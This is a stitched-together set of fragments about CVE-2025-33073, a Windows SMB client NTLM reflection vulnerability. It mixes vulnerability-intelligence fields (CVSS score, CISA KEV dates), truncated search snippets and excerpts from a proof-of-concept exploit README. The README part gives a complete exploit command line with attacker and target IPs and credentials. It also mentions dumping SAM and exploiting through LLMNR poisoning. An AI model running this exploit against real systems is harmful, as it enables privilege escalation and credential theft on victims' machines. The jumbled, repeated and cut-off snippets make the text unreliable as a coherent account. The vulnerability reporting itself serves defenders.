CVE-2025-33073 is an SMB client elevation of privilege vulnerability that allows authenticated attackers to perform NTLM reflection attacks. While it has a network attack vector, it targets SMB client functionality rather than internet-facing server services, making direct internet exploitation unlikely.
Data Source: CIRCL
Confidence: HIGH
Exploitation Method: OTHER
CVE Published: 2025-06-10
Added to CISA KEV: 2025-10-20 132 DAYS BETWEEN CVE AND KEV
CVE-2025-33073 is an elevation of privilege vulnerability in Windows SMB Client. This flaw has been assigned a CVSSv3 score of 8.8 and is actively exploited in ...
CVE-2025-33073 Microsoft Windows SMB Client Improper Access Control Vulnerability ... These types of vulnerabilities are frequent attack vectors ...
CVE-2025-33073. PoC Exploit for the NTLM reflection SMB flaw.If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record. Troubleshooting. I've seen the attack not work sometimes because the hostname is used for the attack which results in a DNS lookup from Kali.
CVE-2025-33073 is the most recent relay attack, which enables an attacker to relay authentication back to the victim's machine – making it a reflection attack.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks. Also a custom command can be ran through proxychains instead of dumping SAM.If you're in the same broadcast domain as the device and it's vulnerable for LLMNR poisioning it's possible to exploit a device without having to register a DNS record.